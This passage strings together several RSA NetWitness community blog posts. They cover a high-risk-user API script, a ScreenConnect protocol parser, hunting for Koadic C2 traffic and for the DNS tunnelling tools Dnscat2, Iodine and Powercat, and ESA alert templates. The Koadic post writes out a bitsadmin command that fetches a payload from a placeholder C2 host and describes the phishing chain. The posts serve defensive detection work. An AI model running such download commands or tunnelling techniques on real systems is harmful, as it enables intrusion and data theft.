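    url = "https://<URL_of_your_SID_Access_Cloud_Console_API>/v1/users/highrisk"  # placeholder
    payload = {"emails": ["user@example.com"]}                                    # placeholder
    headers = {"Authorization": "Bearer <JWT>", "Content-Type": "application/json"}

    resp = requests.put(url, json=payload, headers=headers)
    if not resp.ok:
        # surface the API's error body, e.g. the 404 detail for emails
        # that were not found in any Identity Source
        print(resp.status_code, resp.text)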

Remove Users from the High Risk List

# python highRiskUsers.py -f /path/to/SIDAccess/API.key -o removeHighRiskUsers -u "https://<URL_of_your_SID_Access_Cloud_Console_API>" -e <single_or_multiple_email_address>

 

*Note: same as above about a partially successful PUT to the API

 

The second tool is another script (nwHighRiskUsersReport.sh; also attached at the bottom of this blog) to help report on the NetWitness-specific information about the users added to the High Risk list, the Incident(s) that resulted in them being added, and when they were added.  This script should be run on a recurring basis in order to capture any new additions to the list - the frequency of that recurrence will depend on your environment and how often new incidents are created or updated.

 

The script will create a CEF log for every non-Closed incident that has added an email to the High Risk list, and will send that log to the syslog receiver of your choice.  Some notes on the script's requirements:

  1. must be run as a superuser from the Admin Server
  2. the Admin Server must have the rsa-nw-logplayer RPM installed (# yum install rsa-nw-logplayer)
  3. add the IP address/hostname and port of your syslog receiver on lines 4 & 5 in the script
  4. If you are sending these logs back into NetWitness:
    1. add the attached cef-custom.xml to your log decoder or existing cef-custom.xml (details and instructions here: Custom CEF Parser)
    2. add the attached table-map-custom.xml entries to the table-map-custom.xml on all your Log Decoders
    3. add the attached index-concentrator-custom.xml entries to the index-concentrator-custom.xml on all your Concentrators (both Log and Packet)
    4. restart your Log Decoder and Concentrator services
    5. **Note: I am intentionally not using any existing email-related metakeys in these custom.xml files in order to avoid a potential feedback loop where these events might end up in other Incidents and the same email addresses get re-added to the High Risk list
  5. Or if you are sending them to a different SIEM, perform the equivalent measures in that platform to add custom CEF keys

 

Once everything is ready, running the script:

 

And the results:


With the recent news about ScreenConnect being used in data breaches, I had the opportunity to examine some of the network traffic.  This was traffic that originally landed in OTHER, but as you know, that just means it's an opportunity to learn about some new aspect of our networks.

 

Initially, this traffic was over TCP destination port 443; however, it was not SSL traffic.  A custom parser was written to identify this traffic and register the service type as 7310.  I did not find a document that explained how the application used this custom protocol, so I built this parser with some educated guesswork.

 

 

We start with an 18-byte-long token and match on it within the first 10 bytes of the payload.  If we see that, we are in the right traffic.  Next, I moved forward 1 byte and then extracted the next 64 bytes of payload.  I checked the first byte using the "payload:uint8(1,1)" method, looking for either a "4" or a "6".  In researching this traffic, it appeared that different versions of ScreenConnect would have one of those values.  That value was important, as it led me to determine where the hostname (or IP address) started and what its terminator was.

 

 

If the value was "4", then my hostname started 7 bytes away.  If the value was "6", the hostname started 9 bytes away.  It also helped me identify the terminator.  If the initial value was "4", my terminator appeared to be "0x01".  If the initial value was "6", then the terminator appeared to be "0x02".

 

Now that I was able to identify the start and end positions, I could extract the hostname.  However, it could be either an IP address or a fully qualified domain name.  This is where I referenced an outside function in the 'nwll' file called "determineHostType".  This way, if the extracted value was an IP address, it would be placed in 'alias.ip', and if it was a hostname, it would go in 'alias.host'.
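To show the rough shape of that logic, here is a heavily hedged sketch. This is not the attached parser: the 18-byte token is omitted in the post, so a placeholder stands in for it, and the callback and helper signatures are from memory and should be checked against the real file and the Decoder's Lua parser API:

    local nwll = require('nwll')

    local parser = nw.createParser("screenconnect", "ScreenConnect custom protocol")

    parser:setKeys({
        nwlanguagekey.create("alias.host"),
        nwlanguagekey.create("alias.ip", nwtypes.IPv4),
    })

    local function onToken(self, first, last)
        if first > 10 then return end                        -- token must sit in the first 10 bytes
        local payload = nw.getPayload(last + 2, last + 65)   -- skip 1 byte, take the next 64
        if not payload then return end
        local version = payload:uint8(1, 1)                  -- "4" or "6" per the post (numeric vs. ASCII as observed in the real parser)
        local start, term
        if version == 4 then start, term = 7, 0x01
        elseif version == 6 then start, term = 9, 0x02
        else return end
        for i = start, 64 do                                 -- find the terminator, extract the host
            if payload:uint8(i, i) == term then
                local host = payload:tostring(start, i - 1)
                if host then
                    -- assumed behavior: returns 'alias.ip' for IPs, 'alias.host' otherwise
                    local key = nwll.determineHostType(host)
                    nw.createMeta(self.keys[key], host)
                end
                break
            end
        end
    end

    parser:setCallbacks({
        ["<18-byte token omitted in the post>"] = onToken,
    })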

 

Attached are the parser and PCAP.  This parser has been submitted to Live; however, I wanted you to have it while that process is underway.

 

Good luck and happy hunting.

 

Chris

Attackers love to use readily available red team tools for various stages of their attacks, as this removes the labour required to create their own custom tools. This is not to say that the more innovative APTs are going down this route; it is just something that appears to be becoming more prevalent and that your analysts should be aware of. This blog post covers a readily available red team tool from GitHub.

 

Tools

In this blog post, the Koadic C2 will be used. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 

 

The Attack

The attacker sets up their Koadic listener and builds a malicious email to send to their victim. The attacker wants the victim to run their malicious code, and to help with this, they try to make the email look more legitimate by supplying a Dropbox link and a password for the file:

 

The user downloads the ZIP, decompresses it using the password in the email, and is presented with a JavaScript file that has a .doc extension. Here the attacker is relying on the victim not being well versed with computers and not noticing the obvious problems with this file (extension, icon, etc.):

 

 

 

Fortunately for the attacker, the victim double-clicks the file to open it, and they get a callback to their C2:

 

From here, the attacker can start to execute commands:

 

 

The Detection in NetWitness Packets

The analyst begins their investigation by placing a focus on looking for C2 traffic over HTTP. From here, the analyst can start to pull apart the protocol and look for anomalies within its behaviour; the analyst opens the Service Analysis meta key to do this and observes two pieces of metadata of interest:

 

  • http post missing content-type

  • http post no get

 

 

 

These two queries have now reduced the data set for the analyst from 2,538 sessions to 67:

 

NOTE: This is not to say that the other sessions do not contain malicious traffic, nor that the analyst will ignore them; just that, at this point in time, this is the analyst's focal point. If this traffic turned out to be clean after analysis, they could exclude it from their search and pick apart other anomalous HTTP traffic in the same manner as before. This allows the analyst to go through the data in a more comprehensive and approachable manner.

 

Now that the data set has been reduced, the analyst can start to open other meta keys to understand the context of the traffic. The analyst wants to see if any files are being transferred and what user agents are involved; to do so, they open the Extension, Filename, and Client Application meta keys. Here they observe an extension they do not typically see during their daily hunting, WSF. They see what appears to be a random filename, and a user agent they are not overly familiar with:

 

There are only eight sessions for this traffic, so the analyst is now at a point where they can start to reconstruct the raw sessions and see if they can better understand what this traffic is for. Opening the Event Analysis view, the analyst first looks to see if they can observe any pattern in the connection times, and at how much the payload varies in size:

NOTE: Low variation in payload size, and connections that take place every x minutes, are indicative of automated behaviour. Whether that behaviour is malicious or not is up to the analyst to decipher (this could be a simple weather update, for example), but this sort of automated traffic is exactly what the analyst should be looking for when it comes to C2 communication: weeding out the user-generated traffic to get to the automated communications.

 

Reconstructing the sessions, the analyst stumbles across a session that contains a tasklist output. This immediately stands out as suspicious to the analyst:

 

From here, the analyst can build a query to focus on this communication between these two hosts and find out when this activity started happening:

 

Looking into the first sessions of this activity, the analyst can see a GET request for the oddly named WSF file, and that BITS was used to download it:

 

The response for this file contains the malicious javascript that infected the endpoint:

 

Further perusing the sessions, it is also possible to see the commands being executed by the attacker:

 

The analyst is now extremely confident this is malicious traffic and needs to be able to track it. The best way to do this is with an application rule. The analyst looks through the traffic and decides upon the following two pieces of logic to detect this behaviour:

 

To detect the initial infection:

extension = 'wsf' && client contains 'bits'

To detect the beacons:

extension = 'wsf' && query contains 'csrf='

 

NOTE: The activity observed was only possible due to the communication happening over HTTP. If this had been SSL, the detection via packets would be much more difficult. This is why introducing SSL Decryption/Interception/Offloading is highly recommended. SSL inspection devices are nothing more than a well-designed man-in-the-middle attack that breaks the encryption into two separate encrypted streams. Therefore, they still provide an adequate level of protection to end-users while allowing security analysts and devices to properly monitor and alert when malicious or unwanted activity takes place, such as the web shells shown here. In summary, if you are responsible for protecting your organization’s assets, you should definitely consider the pros and cons of using this technology.

 

The Detection in NetWitness Endpoint

Every day, the analyst should review the IOC, BOC, and EOC meta keys, paying particular attention to the high-risk indicators first. Here the analyst can see a high-risk meta value, transfers file using bits:

 

Here the analyst can see cmd.exe spawning bitsadmin.exe and downloading a suspiciously named file into the \AppData\Local\Temp\ directory. This stands out as suspicious to the analyst:

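The command line behind such a transfer typically looks something like the following (a sketch; the job name, URL, and file name are placeholders standing in for the values seen in the tracking data):

    bitsadmin /transfer myjob /download /priority normal http://<c2_server>/<random>.wsf C:\Users\<user>\AppData\Local\Temp\<random>.wsf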
 

From here, the analyst places an analytical lens on this specific host and begins to look through what other actions took place around the same time. The analyst observes commands being executed against this endpoint and now knows it is infected:

 

Conclusion

Understanding the nuances between user-based behavior and mechanical behavior gives an advantage to the analyst performing threat hunting. If analysts understand what "normal" should look like within their environment, they can easily discern it from abnormal behaviors.

 

Analysts should also be aware that not all attackers will use proprietary tools, or even alter the readily available ones to evade detection. An attacker only needs to make one mistake and you can unravel their whole operation. So don't always ignore the low-hanging fruit.

There is a new space available on RSA Link: Troubleshooting the RSA NetWitness® Platform

The purpose of this space is to consolidate the available troubleshooting information for RSA NetWitness into a single space.

Information is separated into several "widgets" that are used to categorize the types of troubleshooting items:

  • Installation information
  • Knowledge base articles that contain troubleshooting information
  • Blog posts that discuss troubleshooting the RSA NetWitness platform
  • Videos and tutorials
  • Troubleshooting topics from the user guides

The goal of this space is to be the single place you can come to for a wide variety of troubleshooting information. While the information is also available elsewhere on RSA Link, it may be mixed in with other types of information. In this space, all the information you see is targeted toward helping you solve problems that you encounter while using RSA NetWitness.

Quite frequently when testing ESA alerts and output options/templates, I have wanted the ability to manually or repeatedly trigger alerts.  In order to help with this type of testing, I created a couple of ESA Alert templates to generate both scheduled alerting and manual, one-time alerts.

 

Each of these can take a wide variety of time- or schedule-based inputs to generate alerts according to whatever kind of frequency you might want.  The descriptions in each alert have examples, requirements, and links to official Esper documentation with more detail.

 

I see the potential for quite a bit of usefulness with the Crontab alert, especially in 11.3 now that ESA Alert script outputs run from the admin server.
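For illustration, here is a minimal Esper statement of the kind such a template might emit, firing every five minutes using Esper's crontab-style timer:at pattern (a sketch, not the attached template itself):

    @Name('recurring_test_alert')
    select * from pattern [every timer:at(*/5, *, *, *, *)];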

 

Lastly, I created these using freemarker templates (how the ESA Rules from Live are packaged) in order to ensure that the times and schedules used in the alerts adhere to proper syntax and formatting, but of course you should feel free to convert these to advanced rules if you like.

 

 

Introduction

There are many, many ways to exfiltrate data from a network, but one common way to do it is DNS exfiltration.

With these techniques, attackers use the already-open DNS port as the door for uploading and downloading data between the compromised host and their own external server.

 

Obviously that is not possible with the normal daemon for DNS resolution, but with the right software and the right configuration, it is possible to use any DNS server, set up within any infrastructure, to exfiltrate data without any special permissions.

 

But how is this possible?

 

There are many pre-built packages ready to be used for this purpose, and the most common are Dnscat2, Iodine, and Powercat+Dnscat2.

 

Just a quick tip: don't imagine an attacker using a specific version built only for you.  Attackers are lazy and need to be sure their attack is efficient, so most of the time you will end up fighting one of these three DNS exfiltration tools, either renamed or exactly as you can find them on GitHub.

 

Remember to also check the second-level domain to avoid any confusion with legitimate software using DNS tunneling.

 

So, let's take a look at these three tools. All work for the same purpose and over the same TCP/UDP port, but with some differences in how they send the data outside the network:

 

Dnscat2 (https://github.com/iagox86/dnscat2): it connects to a server component via TXT queries, with all data going up and down, to and from, the external server, encrypted or not depending on your choice. This tool is widely used, partly because it has been ported to multiple programming languages, like Ruby, Perl, PowerShell, etc. This makes it easier to implement, and it will essentially work on any network.

 

Iodine (https://code.kryo.se/iodine/): same basic functionality as the previous tool (it tunnels through DNS), but with small differences, like a password for accessing the tunnel; it also uses the NULL record type, which allows the downstream data to be sent without encoding. Each DNS reply can contain over a kilobyte of compressed payload data. There is also an Android version, so most of the work is already done if you want, for example, to implement it on an IoT device running Android.

 

Powercat (https://github.com/besimorhino/powercat): this tool alone does not work as a DNS tunnel, but if the server side is Dnscat2, you get an interactive PowerShell over legitimate-looking DNS traffic, and you can increase your capabilities by adding other PowerShell attack frameworks like Nishang, PowerShell Empire, etc.

 

The purpose of this article is not "how to exfiltrate data from a network". Instead, let's take a look at how our products can help you identify and track any usage of these techniques in your network. For that, I've chosen the common approach used every day by me and my colleagues in Incident Response Services.

 

For this I've chosen RSA NetWitness Network. Let's take a look at the essential steps.


 

Preparation

In RSA NetWitness, click Configure, select Bundle as the Resource Type, click Search, choose Hunting Pack, and click Deploy to deploy the hunting pack, as shown in Figure 1, to the appropriate components of your infrastructure.

Figure 1

 

Now choose Lua Parser as the Resource Type, click Search, choose the nwll and DNS_verbose_lua parsers, and click Deploy to deploy them as shown in Figure 2.

Figure 2

 

Now that your NetWitness Packets (network) environment is ready and has everything it needs to correctly parse and identify DNS traffic, you can start your analysis.

 

Now let's see how to find bad DNS traffic; or better, traffic that crosses the DNS port but is not real DNS traffic.

 

 

Dnscat2 traffic

With the right package and parsers deployed, if there is traffic generated by Dnscat2 in your network, many indicators will jump out and help you identify it quickly.

Figure 3

 

As shown in Figure 3, for Service Type = DNS (service = 53), Service Analysis shows the presence of "dns base36 txt record" and "hostname consecutive consonants", plus "dns large answer" under Risk Information; Hostname Aliases like the ones shown in Figure 3 are a good sign of Dnscat2 traffic.

Scrolling to the other meta keys, as shown in Figure 4, you will find DNS Query Type with the value "txt record" and DNS Response Text with values made of many characters with no apparent meaning. Now you have sufficient alerts!

 

 

Figure 4

 

So, in my network there are queries for TXT records, with base36 encoding, large answers, apparently random text responses, and random-character host aliases? To be sure this is not normal DNS traffic, you can click on one of these events and see what is inside, as shown in Figure 5...

 

Figure 5

 

Now it is clear that you are looking at Dnscat2 traffic, and you have to do further analysis on the source IP address that generated it.

 

A quick query I apply every day to find its presence in the preferred time span:

service = 53 && dns.querytype = 'txt record' && analysis.service = 'hostname consecutive consonants' && analysis.service = 'dns base36 txt record'


 

Iodine traffic 

Let's check some interesting meta that gives us the ability to find Iodine traffic.

 

Figure 6

 

As shown in Figure 6, Service Analysis shows "hostname invalid" and "hostname consecutive consonants", Risk Suspicious shows "dns extremely low ttl", and Host Aliases contains a lot of "strange" hostnames. But let's check if there is something more...

 

 

Figure 7

 

As shown in Figure 7, there is also another interesting field: DNS Query Type says "experimental null record". Job done; all of these meta values are related to Iodine activity, and the packet shown in Figure 8 confirms the traffic.

 

Figure 8

 

Now it is clear that you are looking at Iodine traffic, and you have to do further analysis on the source IP address that generated it.

 

A quick query I apply every day to find its presence in the preferred time span:

service = 53 && dns.querytype = 'experimental null record'

 


 

Powercat + Dnscat2

Looking into Powercat + Dnscat2 is different from the previous cases; let's check why.

As shown in Figure 9, Session Analysis says "single sided udp", Service Analysis says "hostname consecutive consonants", "dns base36 txt record", and "dns single request response", and Hostname Aliases contains a lot of hostnames with strange names.

 

Figure 9

 

Looking at more meta, as shown in Figure 10, there is DNS Query Type with "txt record" and DNS Response Text with a lot of strange text starting with the same character.

 

 

Figure 10

 

It looks similar to Dnscat2 traffic, but not exactly the same; the specific difference between standard Dnscat2 traffic and this variant is the "single sided udp" and "dns single request response" indicators.

 

Figure 11

 

As shown in Figure 11, there is only one request and one response, and that is the main difference between standard Dnscat2 and Powercat with Dnscat2.

Now it is clear that you are looking at Powercat-with-Dnscat2 traffic, and you have to do further analysis on the source IP address that generated it.

 

A quick query I apply every day to find its presence in the preferred time span:

service = 53 && analysis.service = 'hostname consecutive consonants' && analysis.service = 'dns base36 txt record' && analysis.service = 'dns single request response'


 

Addon

Most of the time when you look into DNS traffic, you may encounter something like a client working not only over UDP but also over TCP.

If the information about the source is right, this hunting methodology can also help you achieve some goals around network misconfiguration.

That is because DNS infrastructure needs to be managed, and there are a lot of guides on "How to secure your DNS infrastructure". In a normal situation, a client attempts DNS resolution through one internal server, most of the time a domain controller, which talks to a DNS forwarder that is allowed to go outside the network for resolution (if neither has the answer cached).

So if you see a client on the client network asking for resolution directly from the internet, especially over TCP, you should take a closer look at your DNS infrastructure: a backdoor on a client machine using port 53 probably has direct access to the internet, and everything can be exfiltrated without any DNS tunnel at all, simply using the allowed port.

 

A quick query I apply every day to find its presence in the preferred time span:

direction = 'outbound' && service = 53 && ip.proto = 6

If your source IP addresses include a lot of IPs coming from the client network, you may have a misconfiguration in the network and/or a possible hole.


 

Finally

There are many ways to hunt and dig into a system, but with the right product and the right methodology you can achieve success much faster. This article is meant to be a quick aid in doing that, because we do this every day with our products!

 

Hope this helps.

 

Thank you.

 

Max

 

 
